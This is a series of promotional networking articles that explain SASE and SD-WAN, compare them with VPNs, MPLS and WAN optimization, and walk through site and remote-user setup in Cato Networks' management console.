An enterprise’s network is composed of several types of edges. An edge can be any location or endpoint which needs to connect to any other resource or service available inside or outside the network. This includes the enterprise’s on-premises headquarters, branch offices, data centers, mobile users connecting remotely (e.g. their home), public cloud data centers (e.g. AWS and Azure), 3rd party SaaS applications (e.g. Office365 and Salesforce), and virtually any website across the WWW.

To enable connectivity and secure access for all edges, enterprises are forced to adopt different solutions to manage different edge types. For example VPN for remote users, on-prem Next Generation Firewalls (NGFWs) for the physical locations, cloud-based NGFW for cloud-based applications, Cloud Access Security Brokers (CASB) for SaaS and Secure Web Gateways (SWG) for web access.  This large number of different products introduced unwanted complexity, inefficiency, and potential security loopholes to enterprises. But perhaps there is a better way to enable secure access to any service from any edge? In fact, there is, and it’s called, surprisingly enough, Secure Access Service Edge (SASE).

catonetworks sase sdwan network traffic graph

Cloud-based SASE Traffic Analysis Dashboard

Defining SASE

SASE is a new architecture that converges networking and security into a holistic, unified cloud service. It is a concept defined by Gartner in late 2019 to simplify enterprise networking and security. At the heart of the SASE premise lays the understanding that network and security cannot be addressed separately, using different products and services. The inter-dependency between the two is fundamental, and their convergence is critical for addressing the needs of the modern digital enterprise.

Click here to learn more about SASE and how it differs from SD-WAN.

The Four Pillars of SASE Architecture:

 Four main principles lay at the heart of the SASE architecture:

  1. All edges. A true SASE solution should be able to service all enterprise edge types.
  2. Converged. SASE’s networking and security services should be delivered from one software stack, not discrete appliances integrated together, and all must be managed via a single pane of glass.
  3. Cloud-native. A SASE solution should be built using cloud-native technologies and should support elasticity, auto-scaling and high-availability.
  4. Global. An effective SASE solution should have an extensive global footprint of Points of Presence (PoPs) covering all major locations worldwide.

SASE Showcase: Connecting & Managing All Locations Together

One of SASE’s main goals is to simplify connectivity, access, and management of the enterprise. This is achieved by unifying all the required functionality into a single solution.

For example, in Cato Network’s SASE Cloud platform, all edges connect to the closest Cato PoP and are managed from Cato’s management console. All traffic to and from these edges undergo the same networking optimizations and security inspections to detect and mitigate threats in real-time.

catonetworks sase sd-wan platform

The Cato Network SASE platform provides complete connectivity & management of all endpoints

Connecting physical locations such as the headquarters, branch offices, and data centers, is the simplest scenario. They are controlled by the enterprise and enable an easy deployment of an SD-WAN appliance such as the X1500 (left) and X1700 (right) Cato Socket models shown below: 

catonetwork x1500 x1700 sase appliances

The Cato Socket can manage multiple connections, preferably from multiple ISPs, in active/active mode and continuously monitors them to determine the best performing link to send traffic over:

catonetwork edge sdwan device

On-Premises Edge

Furthermore, the Cato Socket can make user- and application-aware decisions for implementing the defined QoS policies.

In addition to connecting the enterprise’s on-premises data centers, we also need to connect cloud-based applications at public clouds (AWS and Azure). For these environments, we will use Cato’s virtual socket (vSocket) as shown below:

catonetwork virtual socket

Defining network connectivity to any of these locations is done quickly and easily via Cato’s Management console. By clicking the Configuration drop-down menu and selecting Sites you are taken to the site configuration screen:

catonetwork sdwan sase site configuration

Site Configuration

Then by opening the Add site dialog screen, we can configure a new site. We start by naming the new site e.g Best Site Ever:

catonetwork sdwan sase site parameters

New Site Configuration


We then open the site Type drop-down menu and select the site type. Available options include Branch, Headquarters, Cloud Data Center or Data Center (on-premises):

catonetwork sdwan sase site type parameter

Next, we open the “Connection Type” drop-down menu (see figure below) and select the type of Cato Socket connector we wish to use for our site:

catonetwork sdwan sase site connection type

Socket Type Selection

Physical locations typically use the X1500 or X1700 Cato Sockets, while cloud data center locations typically use one of the Cato virtual sockets (vSocket), depending on the cloud being accessed. As can be seen from the list of connections types, there is also an option to connect both physical and cloud sites using an IPsec tunnel.

The additional configurations are pretty straightforward. In addition to country and time zone, we need to define the uplink/downlink bandwidth limitations for the site and the local subnet used to allocate IP addresses to local hosts. And that’s it. Our site is ready go.

Adding remote users is also a breeze. In the configuration section below, select VPN Users:

catonetwork sdwan sase vpn users

We then click on the “+” icon and the new user dialog is shown:

catonetwork sdwan sase vpn user details

New User Configuration

We fill in the user’s full name and email address, and the new user is defined. We then add the user’s phone number and a link for downloading and configuring the Cato client.

Once the Cato Client is installed and launched on the user’s device, it will automatically search for the nearest PoP and establish a secure connection with it:

catonetworks sase sdwan vpn client

The Cato SDP VPN Client

All traffic sent to and from the device is encrypted. The Cato SDP client provides a wide range of statistics, including traffic usage, PoP information, and more.

The SASE Unified Network

Once we’re done configuring all our different edges, we can easily view our entire network topology by selecting My Network > Topology

catonetworks sase sdwan network diagram

Network Topology

We can see all the edges we have defined: On-premises data centers, cloud data centers, HQ/branch offices, and remote users. We can see its status for each defined edge and take a deeper dive to view extensive analytics covering networking, security, and access metrics.

A true SASE solution should enable access and optimize and secure traffic for all network edges. It should make adding new sites and users easy and fast, and it should provide a unified view of your entire network topology.

Summary

In this article, we briefly covered the purpose of SASE and showed how a SASE solution could be used to connect all edge points within an organization, regardless of their location or size. Catonetwork’s SASE platform was used as an example to show how easily a SASE solution can be deployed to provide fast and secure access to users and offices around the world. We examined the four pillars of SASE architecture and saw what a SASE unified network looks like.

More information on SD-WAN and SASE can be found in our dedicated SASE and SD-WAN section.

  • Hits: 36492

SASE and VPNs: Reconsidering your Mobile Remote Access and Site-to-Site VPN strategy

sase vs vpn remote accessThe Virtual Private Network (VPN) has become the go to security solution for keeping communications between networks and endpoints secure. After all, VPNs offer a straightforward, secure method for connecting sites (a site-to-site VPN) that couldn’t justify a high-end, MPLS service, and they enable mobile users to get secure connectivity from anywhere (mobile VPN). Deployment is quick, availability is high, only requiring Internet access, and network costs relatively low given the use of affordable Internet capacity.

Yet, for all that praise, VPNs are far from perfect. They require IT to purchase and deploy separate VPN appliances, increasing capital costs and complicating maintenance. Most VPN solutions require frequent patching, user policy settings, reconfiguration, and oversite. All of which adds to the burden of attempting to maintain security. What’s more, VPNs can introduce latency into mobile connections, as well as require additional login steps, often confusing end users and adding to the burden of the help desk.

All of which issues beg the question: Is it time to drop your VPN and find a better solution for site-to-site and mobile access?

Before we answer the question, let’s take a look at the key topics covered here:

Until recently, the answer to our question above would have been “no.” There wasn’t a better answer out there. However, as networking technology has evolved, an answer to the VPN conundrum may be found in Secure Access Service Edge (SASE), the successor to SD-WAN and, quite possibly, VPNs. Here’s why. 

SASE or VPN: What’s the Difference?

SASE originates from a proposal by research giant Gartner, which defined SASE as a cloud architecture model combining the functions of different network and security solutions into a unified, cloud security platform.

SASE, as envisioned by Gartner, operates as a cloud-naive service connecting all of an organization’s “edges” – including sites, mobile users, IoT devices, and cloud resources -- into a single, global secure network.  It’s cloud-native meaning that the software has all of the scalability, elasticity, and repaid deployment benefits of the cloud.

And the network is secure. We don’t just mean secure as an encrypted network, like SD-WAN. We mean one that also has a complete, embedded security stack protecting against Internet-borne threats.  More specifically Next-Generation Firewall (NGFW), CASB, SWG, ZTNA, RBI, and DNS are all part of the SASE platform.

Devices of different sorts establish encrypted tunnels to the SASE point of presence (PoP). The software in the SASE PoP authenticates connecting user and grants access to defined resources based on user identity and real-time conditions, such as the user’s location or device.

sase point of presence

Incoming traffic is inspected in a single-pass with SASE applying the complete range of security functions, optimized, and forwarded along the optimum path to its destination. As such, edges gain the best possible network experience anywhere in the world, at least that’s the theory. 

SASE Brings VPN Benefits without VPN’s Networking Weaknesses

Like a VPN, SASE can operate securely over the Internet making it affordable and available everywhere. But SASE goes a few steps further than any contemporary VPN solution, bringing the kinds of performance and ease of use that previously were only afforded to sites. In short, SASE makes sites, mobile users, IoT devices and cloud resources “equal citizens” of the new WAN.

SASE simplifies deployment and maintenance by eliminating additional, specialized VPN hardware and concentrators. Instead, sites and mobile users connect directly to the SASE PoP. Sites via SASE’s global SD-WAN service; mobile users connect via client or clientless access.

sase infrastructure

And by establishing tunnels to the nearest PoP and not to one another, SASE avoids the deployment and recovery problems of full mesh, site-to-site VPNs. In those networks, where sites maintain direct tunnels with every other location in the network, significant time is spent first by IT personnel configuring the tunnels and then by the VPN device re-establishing tunnels after a network failure. With SASE, sites only establish one or two tunnels to the local PoP. This is done automatically, making initial deployment very easy, and with so few tunnels, recovering from a network failure can be in a fraction of the time even for what was a very large, meshed network.

SASE also addresses the performance problem faced by VPNs. The WAN optimization and route optimization built into SASE improves traffic performance for all edges. With VPNs, those technologies either weren’t possible (in the case of mobile users) or would have required additional investment (in the case of site-to-site VPNs).

What’s more by SASE eliminates the backhaul that undermines mobile VPN performance. Instead of bring Internet and cloud traffic back to a central inspection point, as is the case with VPNs, SASE brings security inspection to the local PoP. Traffic hits the nearest PoP, gets inspected, and is forwarded directly onto its destination.

SASE Makes Security Much Easier

Not only does SASE address VPN’s networking limitations but having a single security engine for traffic from any edge significantly simplifies security policy management and enforcement.

Access control is much tighter. Rather than giving remote users access to the entire networks, SASE uses cloud-based Software Defined Perimeter (SDP) or zero trust network access (ZTNA), which restricts network access to authorized resources. Users only see the network resources, be they applications or hosts, permitted by their policy. There’s no opportunity for them to “PING” or use other IP tools to investigate the network and uncover unprotected resources. SDP uses strong authentication on access and continuous traffic inspection, helping to further secure endpoints.

Security management is also much easier particularly when combining VPNs with SD-WANs. Rather than maintaining separate security policies for the mobile users connected by VPN and office users sitting behind the SD-WAN device, SASE creates a single set of security policies for all users and resources.

SASE Answers the VPN Questions

SASE with cloud-based SDP proves to be faster, more secure, and easier to manage than legacy VPN systems. It’s the obvious choice for those looking for a modern VPN or to benefit from the combination of VPNs and SD-WAN.

  • Hits: 16589

Understanding Secure Access Service Edge (SASE) and how it integrates with SD-WAN

sase and sd-wan introSoftware Defined Wide Area Networking (SD-WAN) is changing the way that businesses connect to the cloud. With SD-WAN, organizations can move away from closed, proprietary hardware solutions, bringing flexibility and potential cost savings to their operations. 

And yet, while SD-WAN technology seems like a solution to many of the problems that businesses are having connecting to the cloud, there are still some concerns around security and that is where Secure Access Service Edge (SASE) comes into the picture.

Before we dive any deeper, let's take a quick look at what we've got covered:

What is SD-WAN?

Software Defined Wide Area Networking (SD-WAN) is a seismic shift from traditional WAN technology, where proprietary hardware and software are replaced with virtualization technology that can abstract networking from hardware. The “Software Defined” part of an SD-WAN uses virtualization to create a WAN architecture that allows enterprises to leverage any combination of transport services, including MPLS, LTE and broadband internet services, and create a fabric of connectivity that connects users to applications. SD-WANs use a centralized control plane to intelligently direct traffic across the WAN, increasing application performance, resulting in enhanced user experience, increased business productivity and reduced costs for IT.

Access popular articles covering SD-WAN topics by visiting our SD-WAN Network section

How is SASE Different from SD-WAN?

The Secure Access Service Edge, better known as SASE, is a technology proposed by Research Giant Gartner. The research house defines SASE as a cloud architecture that converges various network and security functions into a single, cloud security and networking platform. SASE goes beyond what an SD-WAN can offer by incorporating security protocols and increases the reach of the network with support for mobile devices, IoT devices, and other devices that may not have a persistent connection to the network. What’s more, SASE can securely bridge cloud services into the SD-WAN, allowing branch offices and remote users to access services from most any locations. SASE is delivered as a service, minimizing or eliminating the need for specialized hardware or security appliances.

Understanding SASE and SD-WAN

The SASE model allows IT teams to easily connect and secure all of their organization’s networks and users in an agile, cost-effective and scalable way.

What’s more,

SASE in the Real World:

You can’t have SASE without SD-WAN, the two technologies have a symbiotic relationship that actually flattens the networking and security stack into a single connectivity stack. SASE, as envisioned by Gartner, operates as a platform, which provides organizations with the ability to connect to a single secure network, which then grants secure access to physical and cloud resources, regardless of location. Or, more simply put, SASE brings security to SD-WANs by introducing four primary characteristics:

  • Identity Driven: Organizations will be able to control interactions with resources using a least-privileged strategy combined with strictly enforced access control. Attributes used by that control element include application access policy, user and group identity and the sensitivity of the data being accessed.
  • Cloud Native Architecture: The SASE model architecture requires the implementation of several different cloud capabilities into a platform. That platform will offer agility, be adaptive, self updating, and will give organizations a holistic and very flexible approach to connect, regardless of location.
  • Support for All Edges: SASE creates a single network for allof an organization's resources. Data centers, branch offices, cloud resources, and endpoints. A common interpretation of that deployment may include SD-WAN appliances for the physical edges and software clients for endpoints or browser based clientless connectors.
  • Globally Distributed: SASE platforms must be globally distributed to organizations, meaning that SASE service providers must be able to deliver low latency services to enterprise edges and offer low latency connections into cloud service providers.

catonetworks first sase platform

A proper SASE solution delivers a connectivity platform as a service which brings forth unified cloud management, with zero trust capabilities, incorporated into a single networking stack.

The Benefits of SASE:

SASE brings agility and a holistic approach to both networking and security. Ultimately, SASE proves both innovative and disruptive, and will potentially transform the way network security is consumed over traditional products and cloud services. The most notable benefits of SASE include:

  • Lowered Costs: SASE can reduce the number of components and vendors required to provide edge connectivity into the cloud, while also lowering operational overhead.
  • Improved Network Performance: SASE is built upon a global SD-WAN service, which may leverage a private backbone and incorporates automatic traffic optimization and continuity.
  • Vastly Improved Security: All traffic flow is inspected at the source and the endpoint, creating the opportunity for fully encompassing policies, which can be based upon identity, resources, or other defined elements.
  • Reduced Overhead: With SASE providers operating and maintaining the security stack, IT staffers will not have to worry about updating, patching, or scaling edge connectivity products.

The other benefits from SASE come from the adoption of an SD-WAN platform, where connections can be consolidated, and then managed from a single pane of glass. Additional benefits can be found in an SD-WAN’s core capabilities of reducing proprietary hardware needs and bringing much needed simplicity to cloud connectivity.

Who are the SASE Players:

Numerous vendors are investing in the SASE model and are bringing services online. Gartner has identified more than a dozen vendors that are developing SASE offerings, with notable players, such as Cato Networks, Cisco, FortiNet, Zscaler, all building SASE offerings for the market.

  • Hits: 12803

WAN Optimization vs SD WAN Networks. Today’s Challenges & Difficulties for WAN Optimization

sd wan vs wan accelerationEnterprises have been successfully running WAN optimization appliances at their many distributed sites for years. The devices have done a good job of helping businesses squeeze as much capacity as possible out of their WAN links and to improve performance across low-bandwidth, long-distance network circuits.

WAN optimizers were a boon to telecom budgets when network bandwidth was particularly pricey. Businesses also have used the devices to prioritize applications that are sensitive to delay and packet loss--particularly when traffic is shuttled among corporate-controlled sites.

However, changes in network traffic patterns and application protocols, the tendency to encrypt data in transit, the emergence of software-defined WAN (SD-WAN) and other factors are all challenging the need for WAN optimization in the edge appliance form factor that IT shops have traditionally deployed.

Shifting Network Landscape

wan optimization vs sd wanWhile historically most application requests were directed inward, toward corporate data centers, most are now outbound, toward cloud and Internet locations. As the software as a service (SaaS) computing model continues to gain steam, these trends will only get stronger.

With much of corporate traffic headed toward the cloud, enterprises have little or no control over the far-end site. As a result, it becomes difficult to support a network topology requiring optimization appliances at both ends of the WAN link. Ever try asking Salesforce.com if you could install your own, specially configured WAN optimization appliance in their network? Good luck.

In addition, today’s security schemes can throw a wrench into traditional WAN optimization setups. Nearly all cloud-bound traffic is SSL/TLS-encrypted from the workstation to the cloud using keys that aren’t readily accessible. WAN optimizers can’t see that traffic to shape or treat it, unless the device is brought into the certification path for decryption and re-encryption before delivery. Adding that step introduces a processing burden to the optimization appliance that can impede scalability.

Another change factor is that Internet bandwidth is more plentiful than it was when WAN optimizers came to market, and it’s far more affordable than MPLS capacity. So the requirement to compress data and deduplicate packets to conserve expensive bandwidth, which traditional WAN optimizers are good at, has become less stringent.

Duplication Of Effort

There are also other ways to get some of the traditional WAN optimizer’s benefits baked right into services. Some cloud service providers, such as Amazon with its AWS Global Accelerator service, for example, help improve connections to their services, encroaching a bit on the traditional WAN optimization appliance’s turf.

Today, those WAN links are carrying predominantly HTTP and TCP traffic. That means that the need to accelerate various other application-specific protocols is disappearing. The acceleration capabilities for IP-based traffic offered by cloud providers such as Amazon are now more in demand than the multiprotocol acceleration function of traditional WAN optimizers.

The deduplication and compression capabilities of WAN optimization appliances remain beneficial. However, there is less of a need for them because of greater availability of network capacity. And cloud computing is bringing data closer to users to decrease distance-based latency.

Emergence Of SD-WANs

Amid all these WAN changes, SD-WANs have taken the industry by storm, affording the opportunity to offload traffic from pricey MPLS circuits onto lower-cost links. By incorporating dynamic path selection--the ability to route traffic across the best-performing WAN link available at the moment of transmission--the SD-WAN is subsuming a portion of the WAN optimization role. SD-WANs are still in hockey-stick growth mode, with IDC predicting a 40% compound annual growth rate through 2022.

Catonetworks sd-wan vs mpls acceleration

The SD-WAN cloud is clearly the future of WAN Networking

SD-WANs, depending on the vendor, incorporate other optimization capabilities, too, such as packet-loss correction technology, TCP proxies to compensate for network latency, traffic shaping, and quality of service (QoS) priority marking.

Managed SD-WAN services, or cloud-based SD-WAN, are particularly appealing for the performance improvements they yield. In this setup, your SD-WAN service provider generally runs a private IP network, which it controls end to end. That puts the provider back in the seat of controlling both ends of your connection by linking your sites to its own backbone points of presence all over the world. That means your traffic is no longer subjected to the “best effort” nature of the public Internet, where it traverses circuits managed by multiple providers.

Different Approaches

Enterprises will always want their WAN traffic treated as efficiently as possible with the best possible application performance and response times. But where WAN optimization appliances (or WAN optimization built into edge routers) were once the sole source of application acceleration, the changing WAN landscape means that optimization is being handled in different ways. These include acceleration techniques offered by cloud vendors and, most notably, by popular SD-WAN offerings.

Where WAN optimization takes place will depend on whether you deploy SD-WAN and, if you do, which SD-WAN deployment model you choose: on-premises or as a managed, cloud-based service. One way or another, enterprises should address WAN performance so that their long-haul, particularly global, transmissions don’t sputter and choke response times of their critical applications.

  • Hits: 10278

How To Secure Your SD-WAN. Comparing DIY, Managed SD-WAN and SD-WAN Cloud Services

how to secure your sd-wanWith so much enterprise network traffic now destined for the cloud, backhauling traffic across an expensive MPLS connection to a data center to apply security policy no longer makes sense. Software-defined WANs (SD-WAN) promise lower transport costs with direct, higher-performing connections to cloud and Internet resources. But what are the security implications of moving traffic off of private MPLS VPNs and onto public broadband links?

This article tackles the above and many more questions around enterprise WAN network connectivity options and the different type of SD-WAN network implementations along with their advantages and disadvantages.

Key Topics:

Directly connecting branch offices to the cloud increases your exposure to malware and Internet-borne attacks, expanding your attack surface across many sites. If not adequately addressed, these risks could outweigh the cost and performance benefits of SD-WAN. Let’s take a look at the SD-WAN options for securing your sites.

Related Articles

SD-WAN Deployment Options

There are a few SD-WAN options available. Each requires a different approach to branch security:

  • Do it yourself (DIY): It’s possible to build and manage your own SD-WAN by deploying firewalling and unified threat management (UTM) capabilities yourself at each branch site. You can install separate physical appliances for each type of security you need or run the security tasks as virtual network functions (VNFs) in software. VNFs usually run in a special CPE appliance, but it may also be possible to run the VNFs in your branch router, depending on which router vendor you use.
  • Telco managed SD-WAN services: This option mirrors the DIY approach above; however, a telco resells the needed SD-WAN appliances and software to you and manages the installation on your behalf. The SD-WAN setup is the same but lightens the load on your IT staff and reduces the need for specialized SD-WAN skill sets in-house.
  • SD-WAN as a cloud service (“SD-WANaaS”) from a software-defined carrier (SDC): With this option, most SD-WAN functions run as a distributed, multi-tenant software stack in a global, private cloud maintained by your SDC. The provider integrates multiple levels of security into the network in the cloud, and your traffic traverses the SDC provider’s own IP backbone, avoiding the risk and best-effort performance challenges of the public Internet.

Let’s take a closer look at each approach.

DIY: Deploying Security at Each Site

SD-WAN solutions encrypt branch traffic in transit, but they don’t protect against Internet-borne threats, such as malware.  To tackle those risks, you’ll require an array of security functions, these include next-generation firewalling, intrusion detection and prevention (IDS/IPS), quarantining or otherwise deflecting detected malware, and web filtering.

Those security functions can be deployed as standalone appliances, VNFs running on a vCPE, or a secure web gateway (SWG) service. Regardless, your deployment becomes more complex and your capital costs far more than simply your SD-WAN appliance costs. Also, keep in mind that as traffic volumes grow, appliances and VNFs will require more processing power to keep pace with increased traffic loads, requiring appliance hardware upgrades. And while SWG will inspect Internet traffic, they don’t inspect site-to-site traffic, opening the way for malware to move laterally once entering the enterprise.

Telco Managed SD-WAN Services

By turning to a telco to install and manage your SD-WAN equipment, you alleviate the need for special SD-WAN skillsets in-house. The telco maintains the security edge devices and services; there’s no software patching, updating, and upgrading to worry about.

But at the same time, you’re left dependent on the telco. The telco is responsible for making network upgrades and changes and will often take far longer than if you had made those changes yourself. You’ll also be paying more each month for all of that support and integration work offloaded onto the telco.

And you’re still left with the same technical limitations of an appliance-based approach. This means that with the telco must reflect all of the costs of the design and maintenance of the security and networking infrastructure in their price to you. And as with a DIY approach, you’ll still be left with periodically scaling your appliance as traffic loads grow, further disrupting your IT processes and increasing costs.

SD-WAN as a Service

Integrating SD-WAN with UTM by using a Software-Defined Carrier (SDC) is the simplest solution to deploy and manage and quite possibly the most secure.

Here’s why: When you use an SD-WAN-as-a-service, security is converged into the network and delivered from the cloud. You don’t have to concern yourself with scaling network security as your implementation grows. Your cloud provider has infinite, elastic resources at its disposal, far more than what a small appliance on your premises can handle.

sd-wan network security offerings

Services offered by a complete fully-managed SD-WAN network provider

SDC services usually involve integrating the software for SD-WAN, IPsec, firewalling, and UTM into a single, software stack. By collapsing multiple security solutions into a cloud service, the provider can enforce your unified policy across all your corporate locations, users, and data.

In addition, you will be running your traffic over a higher-grade IP network than the best-effort Internet. SDCs run their own Tier-1 IP backbones with service-level agreements (SLAs) attached to them. There are both security and performance benefits inherent in using the SDC’s network infrastructure compared to the Internet.

Summary

If you’re short on SD-WAN or in your organization security expertise, DIY might introduce cracks into your WAN and leave you vulnerable. Complexity usually increases the potential for human error, which contributes to risk. If you subscribe to that philosophy, you’re better suited to the managed service or as-a-service cloud approach.

If you’re anticipating growth, both in the number of sites and per-site volume, the cloud service is a better fit to your needs. It brings the scalability benefits to the table and provides extra security by transporting your traffic on a private IP backbone, which also provides a performance benefit compared to public Internet links.

The benefits of a secure SD-WAN, however you choose to achieve it, are many. You’ll reduce infrastructure and circuit costs while improving performance with direct-connected links to cloud and Internet resources. You just need to be sure the t’s are crossed and the i’s are dotted on security so you can enjoy SD-WAN’s many advantages with a clean conscience.

  • Hits: 7913

The Most Common Worst Networking Practices and How To Fix Them

gartner report worst networking practicesIn the rush to keep pace with the many challenges facing today’s organizations, all too often networking teams end up adopting practices and processes that are, shall we say, less than perfect. You probably have seen a few yourself in your own organization.

Management refusing to consider new vendors because, well, they’re new. Engineers wanting to do everything manually when automation would save them a ton of time. Overspending on capacity when there are more affordable alternatives. You get the picture.

Some practices are well known, others are less obvious. A great starting point for identifying the worst of the worst in your organization was a recent list compiled by Gartner. The list culls insight from several thousand client interactions.  While the Gartner report requires payment,  a free eBook from Cato Networks explains each networking practice and how they can be addressed with a cloud-based SD-WAN.

The practices fall into three categories — cultural, design and operational, and financial:

  • Cultural practices describe how IT teams relate to collaboration, and more broadly, innovation. Excessive risk avoidance is one example of a “worst” cultural practice. Adherence to manually configuring networking device and the silo-ism that often crops up among IT teams are other examples.
  • Design and operational practices are those practices that restrict the agility, increase the costs, and complicate the troubleshooting of the enterprise network. These practices often stem from having amassed legacy technologies, forcing less than ideal practices. Other practices include the lack of a business-centric network strategy, spending too much for WAN bandwidth, and restricted visibility into the network.
  • Financial “bad” practices stem from the dependencies IT organizations have on their legacy vendor relationships. All too often, busy IT professionals cut corners by leaning on their vendors for technology advice. This particularly the case in newer technologies where an IT professional may lack sufficient background to conduct an assessment. Vendors and their partners have a commercial interest in furthering their own aims, of course. As such, companies end up being locked into vendors or following questionable advice.

Often, worst practices grow out of the best intentions, evolving incrementally over time. Risk avoidance isn’t inherently bad, for example. It stems from the healthy desire to limit network outages. But excessive risk avoidance stems from organizational cultures where teams are locked into dysfunctional postmortems, blaming one another. 

Adopting technologies that encourage transparency can help address the problem. With a common portal used by all offsite networking teams — security, WAN, and mobile — problem resolution is faster, collaboration easier, and finger pointing is eliminated. How do you do that? To learn more, check out the eBook here.

  • Hits: 8021

SD-WAN is the Emerging, Evolving Solution for the Branch Office

sd-wan the evolving solution for branch officesA lot has changed in how people work during the past twenty years. Co-working spaces, mobility, and the cloud now are common. Businesses are spread out and branch offices are empowered.

This new functionality is a good thing, of course. But, at the same time, it raises a big challenge: Multiprotocol Label Switching (MPLS), the way in which most branch offices network today, is a poor match for this new environment. It is an expensive and rigid one-size-fits-all approach to an environment that prizes fluidity and flexibility.

The answer is Software Defined-Wide Area Networking (SD-WAN). It matches the network to branch offices’ needs and provides a superior user experience. It also the potential to reduce costs.

Our Complete Guide to SD-WAN Technology article provides an in-depth coverage on SD-WAN Security, Management, Mobility, VPNs, Architecture and more.

SD-WAN is still a work in progress, no doubt, but the technology is positioned to be the next wave in branch office connectivity -- here's why.

Welcome to the New Branch

Enterprises generally configure WANs in a classic hub-and-spoke manner. Branches are the ends of the spokes and resources are in the hub, typically the headquarters or datacenters. Internet traffic is backhauled across the MPLS-based WAN to the hub for delivery through a secured, Internet access connection.  

That’s a solid, bulletproof approach. However, branch operations have changed radically since MPLS was introduced in the early 1990s. Back then, branch offices were comfortable with a T1 or two. Today's offices need 5x that amount. Back then, most applications and services terminated at MPLS-attached datacenters, not the Internet. Today, most traffic goes out to the Internet. Back then most work was done in offices. Today, work is done, well, everywhere.

MPLS Problems Hurt the New Branch

MPLS-based architectures are a poor fit for the new branch. Bandwidth is far more costly than Internet access (exact amounts will vary between regions and packages). Installation can take months, especially if the provider doesn’t have any available circuits; bandwidth upgrades weeks. This, needless to say, is too slow for today’s environment. International deployments only add to the problems.

The cost and inflexibility of MPLS leads many organizations to skimp on branch office bandwidth and, often, skip on redundancy. Instead, the sites instead are linked by non-redundant cable, DSL or wireless services and therefore are vulnerable to circuit failures and downtime. The use of separate networks makes creating a fully meshed architecture, where every office has a direct connection to every other office, far more difficult, impacting Active Directory and VoIP design. Those connected to MPLS face delays when more bandwidth is needed, such as for branch expansions and seasonal traffic spikes.  

The same antiquated approach extends to contracts. Branch offices often are temporary. One may start in somebody’s home. That worker may quickly be grouped with other workers at a larger branch across town. The three-year contracts offered by MPLS providers is simply inappropriate for such small- or transient-branch offices.

And none of this says anything about two shifts in enterprise networking -- the cloud and mobility. Backhauling Internet traffic adds too much latency, disrupting with the user experience. Often traffic is backhauled only to be sent back across the Internet to a site near the edge. This back and forth -- aptly called the “trombone effect” -- causes significant latency problems and consumes expensive MPLS bandwidth, particularly when the central portal and branch office are far from each other.

No Support for Mobile Users

WANs are all about physical locations. Mobile users, who were not that big a deal “back in the day,” are not supported by MPLS-based WANs.

Typically, mobile employees connect through VPNs to on-premises firewalls or concentrators. Data is sent either to a local access point or a centralized and secure access point on the WAN. In such scenarios, applications and other resources generally are located in different places. This leads to split tunnels and management complexity, which is the enemy of efficient, low latency and inexpensive operations.

One option is site-to-site connectivity via firewall-based VPNs. It’s a bad option, however, it necessitates convoluted Internet routing. The resulting jitter, latency and packet loss impacts voice, video and other sensitive applications. It is a workaround that causes as many problems as it solves.

SD-WAN is the Answer

SD-WANs answer these challenges -- and more. As the name implies, SD-WANs are a subset of the software-defined networking concept, which separates the data being transported from the routing and provisioning information directing the journey, increasing flexibility by orders of magnitude.

The initial versions of SD-WAN focused on bandwidth provisioning and last mile link bonding. That was a great advance. The arrival of SD-WAN 2.0 was even more exciting envisioning the entire network -- the branches, the headquarters, the datacenter and so forth -- as a single unified entity. It adds four elements that enable the selection of the path with the desired attributes through this network to be found:

  • Controllers create traffic policies and send them to virtual and/or physical appliances at each location.
  • Virtualized data services normalize Internet services, such as xDSL, cable, and 4G/LTE, as well as MPLS into a single network.
  • Virtual overlays are secure tunnels that enable underlying data services to be temporarily and fluidly cobbled together -- virtualized -- to create an optimal path and its service characteristics.
  • Application-aware routing is the process of choosing the path with the desired end-to-end performance characteristics. The variables include application requirements, business policies, and real-time network conditions.

Branches become part of this holistic network through an SD-WAN node, which usually is an appliance connected to the LAN on the branch side and MPLS and an Internet service such as cable or DSL on the network side.

When they are installed, the SD-WAN nodes, using zero-touch provisioning, point to a predetermined IP address that links it to the controller. Policies are uploaded to the device. These generally include port configuration, business policies (such as priority and thresholds for failover) and application requirements. This information is combined with real time data to determine the best network path. Latency-intolerant VoIP sessions, for instance, may be provisioned with MPLS and bandwidth-intensive FTP transfers via broadband.

The Different Worlds of MPLS and SD-WAN

Once SD-WANs are accepted as a possible alternative to MPLS-based WANs for branch offices, the focus turns to cost comparisons. The answer is complex. Bandwidth costs go down in an SD-WAN environment because cheaper broadband is a viable alternative for much traffic. On the other hand, security costs rise because branches with direct Internet access (DIA) require next-generation firewalls (NGFWs), IDS/IPS, sandboxing and other security elements. These systems also must be patched and upgraded as necessary, which adds to opex.

Another change is in vendor relationships. MPLS implementations generally are by a single vendor (the famous “one throat to choke”). SD-WAN deployments usually rely on multiple suppliers. This adds complexity to elements such as inventory and payment management. This complexity impacts costs. On a deeper level, the SD-WAN enables changes to be implemented much faster than MPLS. The cost ramifications of adding bandwidth to meet an unexpected sales spike immediately (in the case of SD-WAN) compared to next month (MPLS) is fluid. There is no doubt, however, that adding the bandwidth quickly is a benefit.

Our article MPLS vs SD-WAN provides addition considerations between the two for organizations around the world.

Is SD-WAN Totally Mature? No...

SD-WAN is a young technology that still is evolving in fundamental ways. Organizations considering the technology should be aware of the shortcomings of SD-WAN 2.0.

A key obstacle is related to the need for hardware. In SD-WAN 2.0, DIA is hardware-based. Placing an appliance at each branch office is expensive, as noted above, and requires capacity planning, configuration and maintenance including updates, patches and, perhaps, upgrades that can require hardware changeouts. Security is handled as it is at more substantial corporate locations.

A second shortcoming is that an SD-WAN doesn’t eliminate MPLS (or an equivalent SLA-backed service). Broadband still is an iffy proposition for latency- and loss-sensitive applications. Thus, an SLA-based service remains part of the picture. That makes sense, but it’s odd to go to great trouble to wean the organization off a particular technology -- and retain it.

A third challenge is that today’s SD-WANs don’t do a good job of supporting mobile users and the cloud. Mobile support requires additional hardware and software. SD-WANs only support clouds in a one-off proprietary manner. These approaches add complexity and aren’t a long term solution.

SD-WAN 3.0: How SD-WAN Services Help

The next version of SD-WAN confronts these challenges. SD-WAN 3.0 -- which also is known as SD-WAN as a Service (SDWaaS) -- is fully inclusive. It provides branch office and mobile users with secure end-to-end connectivity to the cloud and data centers.

This brings the cloud “as-a-service” vision to the SD-WAN sector. Servers, storage, network infrastructure, software and security no longer are the enterprises’ problem. Software is distributed across geographically dispersed points-of-presence, each of which is fully-redundant and connected by multiple paths to every other PoP. The organization instantiates, configures and manages their SD-WANs as if they are running on their own dedicated equipment -- but they aren’t.

